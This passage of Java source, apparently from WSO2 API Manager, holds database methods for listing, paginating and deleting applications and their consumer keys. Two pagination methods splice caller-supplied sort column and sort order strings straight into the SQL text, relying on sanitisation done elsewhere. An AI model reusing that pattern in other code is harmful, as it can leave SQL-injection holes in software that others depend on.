* @throws APIManagementException */ public Application[] getApplicationsWithPagination(Subscriber subscriber, String groupingId, int start, int offset, String search, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = null; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITH_MULTIGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITH_MULTIGROUPID"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITHGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITHGROUPID"); } } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE"); } else { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE"); } } try { connection = APIMgtDBUtil.getConnection(); // sortColumn, sortOrder variable values has sanitized in jaggery level (applications-list.jag)for security. sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, tenantDomain + '/' + groupingId); prepStmt.setString(++noOfParams, "%" + search + "%"); prepStmt.setInt(++noOfParams, start); prepStmt.setInt(++noOfParams, offset); } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); } } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); prepStmt.setInt(3, start); prepStmt.setInt(4, offset); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + 
" the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all the applications associated with given subscriber and group id. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Application[] applications = getLightWeightApplications(subscriber, groupingId); for (Application application : applications) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return applications; } /** * Returns all the applications associated with given subscriber and group id, without their keys. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getLightWeightApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_PREFIX; String whereClauseWithGroupId; String whereClauseWithMultiGroupId; if (forceCaseInsensitiveComparisons) { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? " + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?))) "; } } else { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR ( SUB.USER_ID = ? )" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) "; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? 
" + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND SUB.USER_ID=?))"; } } String whereClause; if (forceCaseInsensitiveComparisons) { whereClause = " AND " + " LOWER(SUB.USER_ID) = LOWER(?)"; } else { whereClause = " AND " + " SUB.USER_ID = ?"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { sqlQuery += whereClauseWithGroupId; } else { sqlQuery += whereClause; } try { connection = APIMgtDBUtil.getConnection(); String blockingFilerSql = null; if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData().getDriverName().contains("Microsoft")) { sqlQuery = sqlQuery.replaceAll("NAME", "cast(NAME as varchar(100)) collate " + "SQL_Latin1_General_CP1_CI_AS as NAME"); blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join " + "AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = (x.USER_ID + ':') + x" + ".name)"; } else { blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = " + "concat(concat(x.USER_ID,':'),x.name))"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); int paramIndex = groupIDArray.length; prepStmt = fillQueryParams(connection, blockingFilerSql, groupIDArray, 1); prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriber.getName()); prepStmt.setString(++paramIndex, tenantDomain + '/' + groupingId); } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); } } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, subscriber.getName()); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; Map<String,String> applicationAttributes; int applicationId = 0; while (rs.next()) { applicationId = rs.getInt("APPLICATION_ID"); application = new Application(rs.getString("NAME"), subscriber); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns applications within a tenant 
domain with pagination * @param tenantId The tenantId. * @param start The start index. * @param offset The offset. * @param searchOwner The search string. * @param searchApplication The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. * @throws APIManagementException */ public List<Application> getApplicationsByTenantIdWithPagination(int tenantId, int start, int offset, String searchOwner, String searchApplication, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application applications = null; String sqlQuery = null; List<Application> applicationList = new ArrayList<>(); sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_BY_TENANT_ID"); try { connection = APIMgtDBUtil.getConnection(); sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); rs = prepStmt.executeQuery(); Application application; while (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberName = rs.getString("CREATED_BY"); Subscriber subscriber = new Subscriber(subscriberName); application = new Application(applicationName, subscriber); application.setName(applicationName); application.setId(rs.getInt("APPLICATION_ID")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application.setOwner(subscriberName); applicationList.add(application); } } catch (SQLException e) { handleException("Error while obtaining details of the Application for tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applicationList; } public int getApplicationsCount(int tenantId, String searchOwner, String searchApplication) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_APPLICATIONS_COUNT; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get application count of tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } public Application[] getAllApplicationsOfTenantForMigration(String appTenantDomain) throws APIManagementException { Connection connection; PreparedStatement prepStmt = null; ResultSet rs; Application[] applications = null; String sqlQuery = SQLConstants.GET_SIMPLE_APPLICATIONS; String tenantFilter = "AND SUB.TENANT_ID=?"; sqlQuery += tenantFilter ; try { connection = APIMgtDBUtil.getConnection(); int appTenantId = APIUtil.getTenantIdFromTenantDomain(appTenantDomain); prepStmt = 
connection.prepareStatement(sqlQuery); prepStmt.setInt(1, appTenantId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(Integer.parseInt(rs.getString("APPLICATION_ID"))); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { if (prepStmt != null) { try { prepStmt.close(); } catch (SQLException e) { log.warn("Database error. Could not close Statement. Continuing with others." + e.getMessage(), e); } } } return applications; } /** * Returns all the consumerkeys of application which are subscribed for the given api * * @param identifier APIIdentifier * @return Consumerkeys * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get Applications for given subscriber. */ public String[] getConsumerKeys(APIIdentifier identifier) throws APIManagementException { Set<String> consumerKeys = new HashSet<String>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int apiId; String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_SQL; try { connection = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, connection); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, apiId); rs = prepStmt.executeQuery(); while (rs.next()) { consumerKeys.add(rs.getString("CONSUMER_KEY")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new String[consumerKeys.size()]); } /** * Deletes an Application along with subscriptions, keys and registration data * * @param application Application object to be deleted from the database which has the application Id * @throws APIManagementException */ public void deleteApplication(Application application) throws APIManagementException { Connection connection = null; PreparedStatement deleteMappingQuery = null; PreparedStatement prepStmt = null; PreparedStatement prepStmtGetConsumerKey = null; PreparedStatement deleteRegistrationQuery = null; PreparedStatement deleteSubscription = null; PreparedStatement deleteDomainApp = null; PreparedStatement deleteAppKey = null; PreparedStatement deleteApp = null; ResultSet rs = null; String getSubscriptionsQuery = SQLConstants.GET_SUBSCRIPTION_ID_OF_APPLICATION_SQL; String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_OF_APPLICATION_SQL; String deleteKeyMappingQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTION_KEY_MAPPINGS_SQL; String deleteSubscriptionsQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTIONS_SQL; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_KEY_MAPPINGS_SQL; String deleteDomainAppQuery = SQLConstants.REMOVE_APPLICATION_FROM_DOMAIN_MAPPINGS_SQL; String deleteApplicationQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATIONS_SQL; String deleteRegistrationEntry = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_REGISTRATIONS_SQL; boolean transactionCompleted = true; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getSubscriptionsQuery); prepStmt.setInt(1, 
application.getId()); rs = prepStmt.executeQuery(); if (multiGroupAppSharingEnabled) { transactionCompleted = updateGroupIDMappings(connection, application.getId(), null, null); } List<Integer> subscriptions = new ArrayList<Integer>(); while (rs.next()) { subscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } deleteMappingQuery = connection.prepareStatement(deleteKeyMappingQuery); for (Integer subscriptionId : subscriptions) { deleteMappingQuery.setInt(1, subscriptionId); deleteMappingQuery.addBatch(); } deleteMappingQuery.executeBatch(); if (log.isDebugEnabled()) { log.debug("Subscription Key mapping details are deleted successfully for Application - " + application.getName()); } deleteRegistrationQuery = connection.prepareStatement(deleteRegistrationEntry); deleteRegistrationQuery.setInt(1, application.getId()); deleteRegistrationQuery.execute(); if (log.isDebugEnabled()) { log.debug("Application Registration details are deleted successfully for Application - " + application.getName()); } deleteSubscription = connection.prepareStatement(deleteSubscriptionsQuery); deleteSubscription.setInt(1, application.getId()); deleteSubscription.execute(); if (log.isDebugEnabled()) { log.debug("Subscription details are deleted successfully for Application - " + application.getName()); } prepStmtGetConsumerKey = connection.prepareStatement(getConsumerKeyQuery); prepStmtGetConsumerKey.setInt(1, application.getId()); rs = prepStmtGetConsumerKey.executeQuery(); ArrayList<String> consumerKeys = new ArrayList<String>(); deleteDomainApp = connection.prepareStatement(deleteDomainAppQuery); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); // This is true when OAuth app has been created by pasting consumer key/secret in the screen. String mode = rs.getString("CREATE_MODE"); if (consumerKey != null) { deleteDomainApp.setString(1, consumerKey); deleteDomainApp.addBatch(); KeyManagerHolder.getKeyManagerInstance().deleteMappedApplication(consumerKey); // OAuth app is deleted if only it has been created from API Store. For mapped clients we don't // call delete. if (!"MAPPED".equals(mode)) { // Adding clients to be deleted. consumerKeys.add(consumerKey); } } } deleteDomainApp.executeBatch(); deleteAppKey = connection.prepareStatement(deleteApplicationKeyQuery); deleteAppKey.setInt(1, application.getId()); deleteAppKey.execute(); if (log.isDebugEnabled()) { log.debug("Application Key Mapping details are deleted successfully for Application - " + application .getName()); } deleteApp = connection.prepareStatement(deleteApplicationQuery); deleteApp.setInt(1, application.getId()); deleteApp.execute(); if (log.isDebugEnabled()) { log.debug("Application " + application.getName() + " is deleted successfully."); } if (transactionCompleted) { connection.commit(); } for (String consumerKey : consumerKeys) { //delete on oAuthorization server. 
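            // consumerKeys only holds clients that were created from the API Store (CREATE_MODE other than "MAPPED"),
            // and they are removed at the key manager only after the local database transaction has been committed.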
KeyManagerHolder.getKeyManagerInstance().deleteApplication(consumerKey);
            }
        } catch (SQLException e) {
            handleException("Error while removing application details from the database", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmtGetConsumerKey, connection, rs);
            APIMgtDBUtil.closeAllConnections(prepStmt, null, rs);
            APIMgtDBUtil.closeAllConnections(deleteApp, null, null);
            APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null);
            APIMgtDBUtil.closeAllConnections(deleteMappingQuery, null, null);
            APIMgtDBUtil.closeAllConnections(deleteRegistrationQuery, null, null);
            APIMgtDBUtil.closeAllConnections(deleteSubscription, null, null);
            APIMgtDBUtil.closeAllConnections(deleteDomainApp, null, null);
        }
    }

    public APIKey[] getConsumerKeysWithMode(int appId, String mode) throws APIManagementException {
        Connection connection = null;
        PreparedStatement prepStmt = null;
        ResultSet rs = null;
        ArrayList<APIKey> consumerKeys = new ArrayList<APIKey>();
        String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_WITH_MODE_SLQ;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            prepStmt = connection.prepareStatement(getConsumerKeyQuery);
            prepStmt.setInt(1, appId);
            prepStmt.setString(2, mode);
            rs = prepStmt.executeQuery();
            while (rs.next()) {
                String consumerKey = rs.getString("CONSUMER_KEY");
                if (consumerKey != null && !consumerKey.isEmpty()) {
                    APIKey apiKey = new APIKey();
                    apiKey.setConsumerKey(consumerKey);
                    apiKey.setType(rs.getString("KEY_TYPE"));
                    consumerKeys.add(apiKey);
                }
            }
        } catch (SQLException e) {
            String msg = "Error occurred while getting consumer keys";
            log.error(msg, e);
            throw new APIManagementException(msg, e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs);
        }
        return consumerKeys.toArray(new APIKey[consumerKeys.size()]);
    }

    /**
     * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination.
     *
     * @param applicationName Name of the Application.
     * @param subscriberId Name of Subscriber.
     * @param keyType PRODUCTION | SANDBOX.
     * @param groupingId Grouping ID. When set to null query will be performed using the other three values.
     * @return Consumer Key matching the provided combination.
     * @throws APIManagementException
     */
    public String getConsumerKeyForApplicationKeyType(String applicationName, String subscriberId, String keyType,
                                                      String groupingId) throws APIManagementException {
        String consumerKey = null;
        Connection connection = null;
        PreparedStatement prepStmt = null;
        ResultSet rs = null;
        String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_SQL;
        String whereSubscriberUserID = "SUB.USER_ID = ?";
        if (forceCaseInsensitiveComparisons) {
            whereSubscriberUserID = "lower(SUB.USER_ID) = ?";
            subscriberId = subscriberId.toLowerCase();
        }
        String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ?
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationId Id of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(int applicationId, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_BY_APP_ID_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * This method will return a java Map that contains application ID and token type. * * @param consumerKey consumer key of the oAuth application. * @return Map. 
     * @throws APIManagementException
     */
    public Map<String, String> getApplicationIdAndTokenTypeByConsumerKey(String consumerKey)
            throws APIManagementException {
        Map<String, String> appIdAndConsumerKey = new HashMap<String, String>();
        if (log.isDebugEnabled()) {
            log.debug("fetching application id and token type by consumer key " + consumerKey);
        }
        Connection connection = null;
        PreparedStatement prepStmt = null;
        ResultSet rs = null;
        String sqlQuery = SQLConstants.GET_APPLICATION_ID_BY_CONSUMER_KEY_SQL;
        try {
            connection = APIMgtDBUtil.getConnection();
            prepStmt = connection.prepareStatement(sqlQuery);
            prepStmt.setString(1, consumerKey);
            rs = prepStmt.executeQuery();
            while (rs.next()) {
                appIdAndConsumerKey.put("application_id", rs.getString("APPLICATION_ID"));
                appIdAndConsumerKey.put("token_type", rs.getString("KEY_TYPE"));
            }
        } catch (SQLException e) {
            handleException("Error when reading application subscription information", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs);
        }
        return appIdAndConsumerKey;
    }

    /* Delete mapping record by given consumer key */
    public void deleteApplicationKeyMappingByConsumerKey(String consumerKey) throws APIManagementException {
        Connection connection = null;
        PreparedStatement ps = null;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            String deleteKeyMappingQuery = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_CONSUMER_KEY_SQL;
            if (log.isDebugEnabled()) {
                log.debug("trying to delete key mapping for consumer id " + consumerKey);
            }
            ps = connection.prepareStatement(deleteKeyMappingQuery);
            ps.setString(1, consumerKey);
            ps.executeUpdate();
            connection.commit();
        } catch (SQLException e) {
            handleException("Error while removing application key mapping for consumer key " + consumerKey, e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, connection, null);
        }
    }

    /**
     * This method will delete a record from AM_APPLICATION_KEY_MAPPING by application ID and token type.
     *
     * @param applicationId application id
     * @param tokenType     token type (PRODUCTION || SANDBOX)
     */
    public void deleteApplicationKeyMappingByApplicationIdAndType(String applicationId, String tokenType)
            throws APIManagementException {
        Connection connection = null;
        PreparedStatement ps = null;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            String deleteKeyMappingEntry = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_APPLICATION_ID_SQL;
            if (log.isDebugEnabled()) {
                log.debug("trying to delete a record from AM_APPLICATION_KEY_MAPPING table by application ID " +
                        applicationId + " and token type " + tokenType);
            }
            ps = connection.prepareStatement(deleteKeyMappingEntry);
            ps.setInt(1, Integer.parseInt(applicationId));
            ps.setString(2, tokenType);
            ps.executeUpdate();
            connection.commit();
        } catch (SQLException e) {
            handleException("Error while removing record from the AM_APPLICATION_KEY_MAPPING table", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, connection, null);
        }
    }

    /**
     * Delete a record from AM_APPLICATION_REGISTRATION table by application ID and token type.
     *
     * @param applicationId APIM application ID.
     * @param tokenType Token type (PRODUCTION || SANDBOX)
     * @throws APIManagementException if failed to delete the record.
*/ public void deleteApplicationRegistration(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.REMOVE_FROM_APPLICATION_REGISTRANTS_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_REGISTRATION table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_REGISTRATION table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * returns a subscriber record for given username,tenant Id * * @param username UserName * @param tenantId Tenant Id * @param connection * @return Subscriber * @throws APIManagementException if failed to get subscriber */ private Subscriber getSubscriber(String username, int tenantId, Connection connection) throws APIManagementException { PreparedStatement prepStmt = null; ResultSet rs = null; Subscriber subscriber = null; String sqlQuery; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBER_CASE_INSENSITIVE_SQL; } else { sqlQuery = SQLConstants.GET_SUBSCRIBER_DETAILS_SQL; } try { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, username); prepStmt.setInt(2, tenantId); rs = prepStmt.executeQuery(); if (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); subscriber.setSubscribedDate(rs.getDate("DATE_SUBSCRIBED")); subscriber.setTenantId(rs.getInt("TENANT_ID")); return subscriber; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } return subscriber; } public void recordAPILifeCycleEvent(APIIdentifier identifier, APIStatus oldStatus, APIStatus newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus.toString(), newStatus.toString(), userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus, newStatus, userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier 